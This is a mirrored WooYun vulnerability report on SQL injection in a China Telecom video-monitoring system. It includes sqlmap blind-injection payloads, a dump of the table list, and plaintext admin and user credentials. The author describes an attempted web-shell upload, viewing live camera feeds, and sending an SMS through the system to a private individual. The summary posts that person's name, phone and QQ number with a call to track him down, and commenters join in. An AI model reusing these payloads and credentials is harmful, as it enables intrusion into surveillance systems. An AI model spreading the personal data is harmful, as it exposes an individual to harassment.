中国电信某省视频看护系统SQL注入(可看时时直播哦)

admin 2015年8月11日07:14:02评论252 views字数 239阅读0分47秒阅读模式
摘要

2014-11-15: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2014-12-28: 细节向公众公开

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2014-83160

漏洞标题: 中国电信某省视频看护系统SQL注入(可看时时直播哦)

相关厂商: 中国电信

漏洞作者: 小饼仔

提交时间: 2014-11-15 18:23

公开时间: 2014-12-28 18:24

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: SQL注入 中国电信

1人收藏


漏洞详情

披露状态:

2014-11-15: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2014-12-28: 细节向公众公开

简要描述:

本来想找一找有没有拍到妹子或者什么不该拍到的,结果看到了一个保安大叔在玩手机~
哎~
PS. 一个妹子朋友被骗了,求人肉骗子 骗子信息 电话号码:13918792971(上海) QQ: 94478959 姓名:王小新,自称在南京读过大学,此人租房不给退押金,人跑了,打电话不接,妹子很伤心,有消息的请私信联系,感谢各位大神帮忙,妹子爆照!

详细说明:

系统:中国电信“平安商铺”视频看护系统--中国电信江苏公司

管理员登入链接:http://**.**.**.**/globeyes/admin/index.jsp

中国电信某省视频看护系统SQL注入(可看时时直播哦)

还有个用户登录的 http://**.**.**.**/globeyes/user/index.jsp

这里以管理员登录界面为例,用户登录同理

管理员登陆处存在注入,验证码不会过期

登陆burp抓包,发现是get请求

code 区域
"http://**.**.**.**/globeyes/admin/login.jsp?LoginName=1111&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou

漏洞证明:

参数LoginName存在注入

证明:

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: LoginName
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: LoginName=1111' RLIKE (SELECT (CASE WHEN (1482=1482) THEN 1111 ELSE 0x28 END)) AND 'HdHJ'='HdHJ&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: LoginName=1111' AND SLEEP(5) AND 'wKGK'='wKGK&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'globeyes'
current user is DBA: False
available databases [4]:
[*] globeyes
[*] information_schema
[*] mysql
[*] test

Database: globeyes
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| terminal_log | 2387552 |
| hd_info | 2281330 |
| process_info | 2120898 |
| system_status | 845777 |
| user_fee | 841467 |
| storage | 366471 |
| terminal_online_time | 285318 |
| dispmsg_bak | 256170 |
| system_stat | 185727 |
| user_log | 88911 |
| sms_queue | 44308 |
| test_table | 39799 |
| saveinfo | 27904 |
| monitor_event | 8620 |
| terminal_param | 8426 |
| `user` | 8015 |
| terminal | 6444 |
| voice_queue | 5523 |
| child_terminal | 3605 |
| notify_service | 676 |
| admin | 258 |
| area | 129 |
| user_t | 87 |
| alarm_dispose | 60 |
| store_setup | 60 |
| police_service | 53 |
| ipc | 36 |
| terminal_t | 34 |
| notify_service_temp | 33 |
| partition_list | 29 |
| ttt | 24 |
| process_list | 23 |
| host_info | 22 |
| police_watcher | 21 |
| service_monitor | 20 |
| police | 19 |
| software_version | 18 |
| product | 16 |
| SaveSwitcher | 16 |
| client_session | 13 |
| alarm_setting | 7 |
| manufacturer | 7 |
| dispmsg | 5 |
| feeset | 1 |
+----------------------+---------+

数据量加起来近千万,不过很多是设备信息。

然后找了找,找到了管理员表:admin

试了前面好多个账号,不是区域管理员就是设备安装人员

最后决定选最后一个,结果有惊喜,貌似是超级管理员!

账号密码adminliunan 123456abc

然后我们登入系统,会跳转到 **.**.**.**:6886/globeyes/admin/mainForm.jsp

中国电信某省视频看护系统SQL注入(可看时时直播哦)

然后我们来看一下功能

管理员部分:修改、删除、创建管理员

中国电信某省视频看护系统SQL注入(可看时时直播哦)

用户管理:添加、删除、修改用户密码、快速开户

中国电信某省视频看护系统SQL注入(可看时时直播哦)

终端管理:

中国电信某省视频看护系统SQL注入(可看时时直播哦)

系统管理:里面很多ip,没仔细研究

中国电信某省视频看护系统SQL注入(可看时时直播哦)

其他功能不列了,足以证明该账户是超级管理员了~

然后找找能不能上传shell,找了下,有能上传文件的,上传了shell,结果代码没一行变成添加设备名称,害得我一个个手动删除了这些设备。拿shell失败

最后拿里面的接口测试功能给问题描述里面的骗子发了条短信,骗子真可恶!

管理员到此为止。

然后我们来找一个用户,看一下用户这边的系统功能

这里为了不影响用户使用,没有用超级管理员重置密码,是到数据库查的密码,MD5解密之后得到

用户名 hyzx 密码 123456

这密码,无语了

成功登入,是个地税局的,可以看各个监控的视频

中国电信某省视频看护系统SQL注入(可看时时直播哦)

保安大叔

中国电信某省视频看护系统SQL注入(可看时时直播哦)

用户信息

中国电信某省视频看护系统SQL注入(可看时时直播哦)

可以录像,截图,其他功能就不贴了

rank看着给吧~

修复方案:

系统里面有日志记录,不能删除,这里声明一下未做破坏,只是测试了一下,谢绝查水表!

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-18 12:06

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-11-13 18:34 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    3

    妹子的图呢?

  2. 2014-11-13 19:21 | 安然意境 ( 普通白帽子 | Rank:194 漏洞数:83 | 暗室中很难找到黑猫,尤其当里面根本没猫的...)

    1

    我是来围观大神社工的。

  3. 2014-11-13 19:29 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @wefgod 你要人肉到骗子了,妹子就爆照了~

  4. 2014-11-13 19:30 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @安然意境 求大神~

  5. 2014-11-14 09:19 | 李梓羿 ( 路人 | Rank:5 漏洞数:3 | 菜鸟一只,来此处聆听大牛教诲。)

    1

    @小饼仔 这人是南工院01届国贸的,有大神渗透进他们学校或者查手机号应该可以查得到

  6. 2014-11-14 10:09 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @李梓羿 大神,可否有其他信息~

  7. 2014-11-14 10:10 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @李梓羿 南京工业职业技术学院?

  8. 2014-12-28 20:11 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    1

    @小饼仔 妹子爆照。

  9. 2014-12-29 10:05 | BMa 中国电信某省视频看护系统SQL注入(可看时时直播哦) ( 核心白帽子 | Rank:2078 漏洞数:229 )

    1

    这个不就是神眼看护系统?当初应该更详细些的

  10. 2014-12-29 10:15 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @机器猫 人肉到骗子就爆~

  11. 2014-12-29 10:16 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @BMa 写详细不是就等于公开了~

  12. 2014-12-29 10:25 | BMa 中国电信某省视频看护系统SQL注入(可看时时直播哦) ( 核心白帽子 | Rank:2078 漏洞数:229 )

    1

    @小饼仔 我挖过一个联通的神眼看护系统,应该是同一套系统,不过我的注入需要登录 http://wooyun.org/bugs/wooyun-2014-084094

  13. 2014-12-29 10:28 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @BMa 界面类似,应该是同一套,不同省的

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin